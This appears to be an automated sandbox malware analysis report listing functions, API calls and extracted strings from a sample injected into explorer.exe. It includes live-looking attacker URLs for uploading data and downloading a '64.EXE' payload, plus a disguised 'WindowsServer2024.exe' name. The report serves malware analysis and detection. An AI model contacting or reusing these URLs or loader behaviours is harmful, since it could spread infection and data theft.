413->417 414->407 416->407 421 c060f8 417->421 422 c060fa-c06102 417->422 421->407 423 c06104-c0610f WSAGetLastError 422->423 424 c0612b-c06133 422->424 425 c06111-c06123 GetTickCount 423->425 426 c06129 423->426 427 c06163-c0616e SleepEx 424->427 428 c06135-c0613b GetTickCount 424->428 429 c06125 425->429 430 c06127 425->430 426->407 427->405 431 c06142-c0615f call c03370 428->431 429->407 430->424 431->427 434 c06161 431->434 434->431
                                                                            APIs
                                                                            Strings
                                                                            • {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}, xrefs: 00C05D2C
                                                                            • {50EF1399-6492-458E-896D-12BB129EB697}, xrefs: 00C05DA7
                                                                            • {C3397568-8840-4085-8F6E-BC07C085BB3B}, xrefs: 00C05D63
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventMutexOpen$CreateObjectReleaseSingleWait
                                                                            • String ID: {50EF1399-6492-458E-896D-12BB129EB697}${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${C3397568-8840-4085-8F6E-BC07C085BB3B}
                                                                            • API String ID: 385723476-3953213537
                                                                            • Opcode ID: 0171fc8fe2a2caf8a8dd4e850ab5321596dcbdb07deaa844fe753b2e4925b558
                                                                            • Instruction ID: e223973b5d7306524d08164424b5dfd795eb3e62cfa1f4fd750288f3d6c225da
                                                                            • Opcode Fuzzy Hash: 0171fc8fe2a2caf8a8dd4e850ab5321596dcbdb07deaa844fe753b2e4925b558
                                                                            • Instruction Fuzzy Hash: EFF14D31518A40C6F760DF65F86876EB3A1F7C4754F205226E69A82AF8CF7CC999DB00
                                                                            Function 00BE53B0 Relevance: 61.6, APIs: 25, Strings: 10, Instructions: 310stringencryptionmemoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 600 be53b0-be53dc LocalAlloc 601 be53de 600->601 602 be53e8-be5593 lstrcpyW * 7 call bf2160 600->602 603 be5a06-be5a0e 601->603 610 be568e-be5693 602->610 611 be5599-be5616 CryptBinaryToStringW * 2 602->611 605 be5a1d-be5a25 603->605 606 be5a10-be5a17 LocalFree 603->606 608 be5a27-be5a2e LocalFree 605->608 609 be5a34-be5a3a 605->609 606->605 608->609 615 be5a3c-be5a41 CloseHandle 609->615 616 be5a47-be5a4d 609->616 612 be569f-be56ad call be52c0 610->612 613 be5695 610->613 611->610 614 be5618-be5686 call c08378 lstrcpyW 611->614 623 be56af 612->623 624 be56b9-be56c6 LocalFree 612->624 613->603 614->610 615->616 619 be5a4f-be5a54 CloseHandle 616->619 620 be5a5a-be5a64 616->620 619->620 623->603 625 be56d1-be56d6 624->625 626 be56dc-be5766 call bf9cb0 625->626 627 be57a8-be57b0 625->627 634 be5768-be576f 626->634 635 be5773-be5797 WaitForSingleObject 626->635 628 be57bb-be57bd RtlExitUserThread 627->628 629 be57b2-be57b9 627->629 631 be57c3-be57c8 628->631 629->628 629->631 631->603 633 be57ce-be5839 call c091b0 call bf2230 631->633 643 be583b 633->643 644 be5845-be58d2 call c08378 call bf0740 633->644 634->635 637 be5771 634->637 638 be5799 635->638 639 be57a3 635->639 637->627 638->603 639->625 643->603 649 be58de-be5931 WaitForMultipleObjects WaitForSingleObject 644->649 650 be58d4 644->650 651 be593d-be5952 GetExitCodeProcess 649->651 652 be5933 649->652 650->603 653 be595e-be5965 651->653 654 be5954 651->654 652->603 655 be59aa-be59d7 WaitForSingleObject 653->655 656 be5967-be596f 653->656 654->603 659 be59db-be59e1 655->659 660 be59d9 655->660 657 be597b-be599f WaitForSingleObject 656->657 658 be5971 656->658 661 be59a5 657->661 662 be59a1 657->662 658->603 663 be59ee-be59f4 659->663 664 be59e3-be59e8 CloseHandle 659->664 660->603 661->631 662->603 665 be59f6-be59fb CloseHandle 663->665 666 be5a01 663->666 664->663 665->666 666->603 666->631
                                                                            APIs
                                                                            Strings
                                                                            • HWID_%s, xrefs: 00BE564F
                                                                            • {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}, xrefs: 00BE5863
                                                                            • https://woo097878781.win/upload.php, xrefs: 00BE547D
                                                                            • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0, xrefs: 00BE5443, 00BE56FE
                                                                            • %s %s, xrefs: 00BE5877
                                                                            • {75DBD054-29DD-4A93-8CEC-1ACB8CD829DA}, xrefs: 00BE53E8
                                                                            • https://woo097878781.win/64.EXE, xrefs: 00BE5723
                                                                            • {77F3A004-6E1A-45B6-91BA-6F11612691D9}, xrefs: 00BE549A
                                                                            • {F8334C8B-EA9E-45F9-ADFE-BAE309D22900}, xrefs: 00BE5426, 00BE5890
                                                                            • {C3397568-8840-4085-8F6E-BC07C085BB3B}, xrefs: 00BE5409
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpy$Local$BinaryCloseCryptFreeHandleString$Alloc
                                                                            • String ID: %s %s$HWID_%s$Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0$https://woo097878781.win/64.EXE$https://woo097878781.win/upload.php${75DBD054-29DD-4A93-8CEC-1ACB8CD829DA}${77F3A004-6E1A-45B6-91BA-6F11612691D9}${C3397568-8840-4085-8F6E-BC07C085BB3B}${D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}${F8334C8B-EA9E-45F9-ADFE-BAE309D22900}
                                                                            • API String ID: 1616647813-368922710
                                                                            • Opcode ID: fb057543f897bf854077adb860b26d5b8eb43cbc544869e0975fe74bd2c6d831
                                                                            • Instruction ID: 3f4b37b8bc45e8888c82363ebdc1406a6603c1cc99a49db22464e162d236acb6
                                                                            • Opcode Fuzzy Hash: fb057543f897bf854077adb860b26d5b8eb43cbc544869e0975fe74bd2c6d831
                                                                            • Instruction Fuzzy Hash: DB024835204B84C6FB60DF15F8A8B9A73A1F788B58F905226DA4E837A5DF7CC558CB01
                                                                            Function 00BE4DA0 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 218filestringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 929 be4da0-be4e0d 930 be4e0f-be4e2b SHGetKnownFolderPath 929->930 931 be4e65-be4e98 GetTempPathW 929->931 932 be4e2d-be4e2f 930->932 933 be4e34-be4e63 call c08378 CoTaskMemFree 930->933 934 be4ebd-be4ebf 931->934 935 be4e9a-be4ebb call c08378 931->935 936 be5219-be5221 932->936 941 be4ec4-be4ed5 933->941 934->936 935->941 942 be4f4d-be4fd7 lstrcpyW call c08378 CreateFileW 941->942 943 be4ed7-be4f37 call c08378 CreateDirectoryW GetLastError 941->943 949 be4ffa-be5030 WriteFile 942->949 950 be4fd9-be4ff1 GetLastError 942->950 943->942 948 be4f39-be4f44 943->948 948->942 951 be4f46-be4f48 948->951 953 be5032-be5041 949->953 954 be5043-be5053 CloseHandle 949->954 950->949 952 be4ff3-be4ff5 950->952 951->936 952->936 953->954 955 be5058-be507e CloseHandle 953->955 954->936 956 be5084-be5175 call c08378 CreateProcessW 955->956 957 be5183-be520e CoInitializeEx call c08378 ShellExecuteW CoUninitialize 955->957 963 be517e 956->963 964 be5177-be5179 956->964 962 be5214 957->962 962->936 963->962 964->936
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateErrorLastPath$DirectoryFileFolderFreeKnownTaskTemplstrcpy
                                                                            • String ID: "%s"$"%s" "%s"$%s\%s$%s\%s$Open$h
                                                                            • API String ID: 1929679530-3531242659
                                                                            • Opcode ID: 0f1c72e8aa291dc0e6dd980f3150c005a203dd71a7ce534f4f7e3533c3246e6d
                                                                            • Instruction ID: ff212a963c6d451a1198104cae8451038f59675eddb5e5904e57cf28b6525b0b
                                                                            • Opcode Fuzzy Hash: 0f1c72e8aa291dc0e6dd980f3150c005a203dd71a7ce534f4f7e3533c3246e6d
                                                                            • Instruction Fuzzy Hash: A7B12872218BC496EB70DB65E4947DBB3A1F788754F804626D68D83BA8EF3CC518CB40
                                                                            Function 00BF9CB0 Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 340COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 965 bf9cb0-bf9d5a call c092b0 call be21c0 970 bf9d5c-bf9d7d call bfb370 965->970 971 bf9d82-bf9d8d 965->971 977 bfa484-bfa48c 970->977 973 bf9d9f-bf9dad 971->973 975 bf9daf-bf9dd4 973->975 976 bf9dd6-bf9dde 973->976 975->973 980 bf9e06-bf9e21 LocalAlloc 976->980 981 bf9de0-bf9e01 call bfb370 976->981 982 bfa37d-bfa382 980->982 983 bf9e27-bf9e48 CreateEventW 980->983 981->977 987 bfa388-bfa3c0 call bfb3a0 LocalAlloc 982->987 988 bfa463-bfa47c call bfb370 982->988 985 bf9e4e-bf9e7c LocalAlloc 983->985 986 bfa372-bfa377 LocalFree 983->986 990 bfa364-bfa36c CloseHandle 985->990 991 bf9e82-bf9ea3 LocalAlloc 985->991 986->982 999 bfa3e8-bfa461 call bfb3a0 call be39a0 call c08b30 call bfb3a0 call bfb370 987->999 1000 bfa3c2-bfa3e3 call bfb370 987->1000 988->977 990->986 994 bf9ea9-bf9f1d call c091b0 991->994 995 bfa356-bfa35e LocalFree 991->995 1009 bfa348-bfa350 LocalFree 994->1009 1010 bf9f23-bf9f55 994->1010 995->990 999->977 1000->977 1009->995 1010->1009 1015 bf9f5b-bf9f8a 1010->1015 1020 bfa33a 1015->1020 1021 bf9f90-bf9fee 1015->1021 1020->1009 1021->1020 1024 bf9ff4-bfa001 1021->1024 1025 bfa003-bfa00e 1024->1025 1026 bfa010 1024->1026 1027 bfa01b-bfa078 1025->1027 1026->1027 1029 bfa07e-bfa091 1027->1029 1030 bfa32c 1027->1030 1031 bfa0ce-bfa0d6 1029->1031 1032 bfa093-bfa0c7 1029->1032 1030->1020 1033 bfa0d8-bfa0e0 1031->1033 1034 bfa0f4-bfa127 1031->1034 1032->1031 1035 bfa31e 1033->1035 1036 bfa0e6-bfa0ee 1033->1036 1034->1035 1039 bfa12d-bfa15d WaitForMultipleObjects 1034->1039 1035->1030 1036->1034 1036->1035 1039->1035 1040 bfa163-bfa176 1039->1040 1040->1035 1042 bfa17c-bfa1ac WaitForMultipleObjects 1040->1042 1042->1035 1043 bfa1b2-bfa1f3 1042->1043 1045 bfa1fa-bfa22a call c093e0 1043->1045 1046 bfa1f5 1043->1046 1049 bfa22c 1045->1049 1050 bfa231-bfa24b 1045->1050 1046->1035 1049->1035 1051 bfa24d-bfa252 1050->1051 1051->1035 1052 bfa258-bfa269 1051->1052 1053 bfa277-bfa279 1052->1053 1054 bfa27b 1053->1054 1055 bfa280-bfa2b0 WaitForMultipleObjects 1053->1055 1054->1035 1056 bfa2b4-bfa2bd 1055->1056 1057 bfa2b2 1055->1057 1058 bfa2bf-bfa2c7 1056->1058 1059 bfa2c9-bfa319 call be2260 call bfb4b0 1056->1059 1057->1035 1058->1035 1059->1051
                                                                            APIs
                                                                            • std::rethrow_exception.LIBCMTD ref: 00BF9D70
                                                                            • std::rethrow_exception.LIBCMTD ref: 00BF9DF4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: std::rethrow_exception
                                                                            • String ID: */*$GET$h
                                                                            • API String ID: 1317400359-3109941101
                                                                            • Opcode ID: 53e49ed18156fcc6834767a953aadd6bc91d445507a3527b6585ba5e2276e322
                                                                            • Instruction ID: c1998c8449fb4ee9b757a3a0521ccfe02c1285d09cbdc36f57ec97d83f3c619b
                                                                            • Opcode Fuzzy Hash: 53e49ed18156fcc6834767a953aadd6bc91d445507a3527b6585ba5e2276e322
                                                                            • Instruction Fuzzy Hash: B802D272218AC886E774DB55E4947EEB7A0F389784F504126DB8D83BA8DF7DC588CB01
                                                                            Function 00C02210 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 132threadnetworkstringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1064 c02210-c02228 lstrlenW 1065 c022a0-c022a7 1064->1065 1066 c0222a-c0224c CreateEventW 1064->1066 1068 c0238c-c02393 1065->1068 1069 c022ad-c022b5 call bfddc0 1065->1069 1066->1065 1067 c0224e-c02282 CreateThread 1066->1067 1070 c02284 1067->1070 1071 c02288-c02295 LocalFree 1067->1071 1072 c02395 call bef200 1068->1072 1073 c0239a-c023a1 1068->1073 1069->1068 1082 c022bb-c022f7 call bef510 1069->1082 1070->1065 1071->1065 1072->1073 1076 c023a3 call beee80 1073->1076 1077 c023a8-c023af 1073->1077 1076->1077 1080 c023b1 call bfc130 1077->1080 1081 c023b6-c023c7 call bf6790 1077->1081 1080->1081 1089 c02432-c02443 WSAStartup 1081->1089 1090 c023c9-c023eb CreateEventW 1081->1090 1082->1068 1088 c022fd-c02386 call c08378 call be7ef0 LocalFree 1082->1088 1088->1068 1091 c02445-c0244c 1089->1091 1092 c024bd 1089->1092 1090->1089 1094 c023ed-c02421 CreateThread 1090->1094 1097 c0247a-c024ae CreateThread 1091->1097 1098 c0244e-c02473 CreateThread 1091->1098 1099 c024c2-c024ca 1092->1099 1095 c02423 1094->1095 1096 c02425-c0242c CloseHandle 1094->1096 1095->1089 1096->1089 1102 c024b0-c024b5 1097->1102 1103 c024b7 WSACleanup 1097->1103 1098->1097 1102->1099 1103->1092
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$Thread$EventFreeLocal$CleanupCloseHandleStartuplstrlen
                                                                            • String ID: "%s%s"$UNLOAD.TXT$WindowsServer2024$WindowsServer2024$WindowsServer2024.exe${741330C7-73F4-49B6-9258-6679317DED46}
                                                                            • API String ID: 168511978-710896368
                                                                            • Opcode ID: 67abe8c88c688752f347c4032eb8ca2881074141af63408430bdc0ac8b336b55
                                                                            • Instruction ID: 873dd701552433b739b463e8eef14f75e00fbb32d976f3e66d540913394d8989
                                                                            • Opcode Fuzzy Hash: 67abe8c88c688752f347c4032eb8ca2881074141af63408430bdc0ac8b336b55
                                                                            • Instruction Fuzzy Hash: E4613D32114B8582F774EF60F968BAA33A5F798358F409226D95947AB4DF7DC68CCB00
                                                                            Function 00BE1000 Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 82COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00BF87C0: LoadLibraryW.KERNEL32 ref: 00BF87D2
                                                                            • ExitProcess.KERNEL32 ref: 00BE104B
                                                                            • GetModuleFileNameW.KERNEL32 ref: 00BE1076
                                                                            • ExitProcess.KERNEL32 ref: 00BE1082
                                                                            Strings
                                                                            • {650443EC-0EFE-4819-82E8-5F93F6D2E6A5}, xrefs: 00BE10AF
                                                                            • {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}, xrefs: 00BE10FB
                                                                            • {36B5A614-B027-4841-8B7A-585CE588BF9D}, xrefs: 00BE1134
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess$FileLibraryLoadModuleName
                                                                            • String ID: {36B5A614-B027-4841-8B7A-585CE588BF9D}${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${650443EC-0EFE-4819-82E8-5F93F6D2E6A5}
                                                                            • API String ID: 2450766465-2053532797
                                                                            • Opcode ID: 482fb3a350b31bacb31896883e192aa97b6bd53c2f9ebca60f0dcddbc31280cb
                                                                            • Instruction ID: f8648e9643fbc8f9537497963af8b521ebb8752d028cc7536eba7c65d42f4d12
                                                                            • Opcode Fuzzy Hash: 482fb3a350b31bacb31896883e192aa97b6bd53c2f9ebca60f0dcddbc31280cb
                                                                            • Instruction Fuzzy Hash: 3E415E71124AC082F724EB25F869BAE73E1FB59780FA04629D68A82664DF7DC58CC740
                                                                            Function 00BE7EF0 Relevance: 25.2, APIs: 10, Strings: 4, Instructions: 708COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00BF7DA0: lstrlenW.KERNEL32 ref: 00BF7DEC
                                                                            • CoInitializeEx.COMBASE ref: 00BE7FFA
                                                                            • CoInitializeSecurity.COMBASE ref: 00BE804F
                                                                            • CoUninitialize.COMBASE ref: 00BE8E02
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Initialize$SecurityUninitializelstrlen
                                                                            • String ID: PT%dS$PT0S$d$default
                                                                            • API String ID: 1917595471-1758076759
                                                                            • Opcode ID: d6086f98d6119a2dfd25ad01eb9b79d04d1ef771eeed4e37cabfb9a82e3ec31b
                                                                            • Instruction ID: 7130df855654d3807daa5cc252e55cfc5cc7be1b0695c5b28c6f2b0f77ceb671
                                                                            • Opcode Fuzzy Hash: d6086f98d6119a2dfd25ad01eb9b79d04d1ef771eeed4e37cabfb9a82e3ec31b
                                                                            • Instruction Fuzzy Hash: 8C828336209FC8C6DA71DB15E8943AEB3A5F3C8B95F404166DA8D43B68DF39C649CB40
                                                                            Function 00BFDAD0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 106encryptionsynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00BFDB10
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Crypt$Hash$Context$DataRelease$AcquireCreateDestroyObjectSingleWait
                                                                            • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                                            • API String ID: 1452691613-63410773
                                                                            • Opcode ID: a49916f8dd68e5eae8b0ebcf852319b595e90230a14c1e63738e3af535b9c1ed
                                                                            • Instruction ID: 911ff2d336722018b00936c624d700effa6c35f7a0101d60f9a0f30f6363ce59
                                                                            • Opcode Fuzzy Hash: a49916f8dd68e5eae8b0ebcf852319b595e90230a14c1e63738e3af535b9c1ed
                                                                            • Instruction Fuzzy Hash: EC510B36618A8482E750CF19F494B6EB7A2F7C5784F505525F78A83A68CFBDC889CF40
                                                                            Function 00C02286 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 101threadnetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalFree.KERNEL32 ref: 00C02386
                                                                            • CreateEventW.KERNEL32 ref: 00C023D6
                                                                            • CreateThread.KERNEL32 ref: 00C0240C
                                                                            • CloseHandle.KERNEL32 ref: 00C0242C
                                                                            • WSAStartup.WS2_32 ref: 00C0243B
                                                                            • CreateThread.KERNEL32 ref: 00C0246D
                                                                            • CreateThread.KERNEL32 ref: 00C02499
                                                                              • Part of subcall function 00BFDDC0: AllocateAndInitializeSid.ADVAPI32 ref: 00BFDE32
                                                                              • Part of subcall function 00BFDDC0: CheckTokenMembership.ADVAPI32 ref: 00BFDE4F
                                                                              • Part of subcall function 00BFDDC0: FreeSid.ADVAPI32 ref: 00BFDE66
                                                                            • WSACleanup.WS2_32 ref: 00C024B7
                                                                              • Part of subcall function 00BEF510: SHGetKnownFolderPath.SHELL32 ref: 00BEF587
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF59A
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF5B5
                                                                              • Part of subcall function 00BEF510: LocalAlloc.KERNEL32 ref: 00BEF5DC
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF620
                                                                              • Part of subcall function 00BEF510: CoTaskMemFree.COMBASE ref: 00BEF635
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                              • Part of subcall function 00BE7EF0: CoInitializeEx.COMBASE ref: 00BE7FFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
